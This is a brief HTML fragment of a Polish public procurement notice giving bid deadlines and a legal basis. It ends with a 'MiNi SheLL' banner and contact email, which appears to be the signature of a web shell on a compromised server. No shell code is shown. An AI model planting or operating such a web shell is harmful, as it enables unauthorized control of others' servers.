class="normal">2021-05-21 14:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-19</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com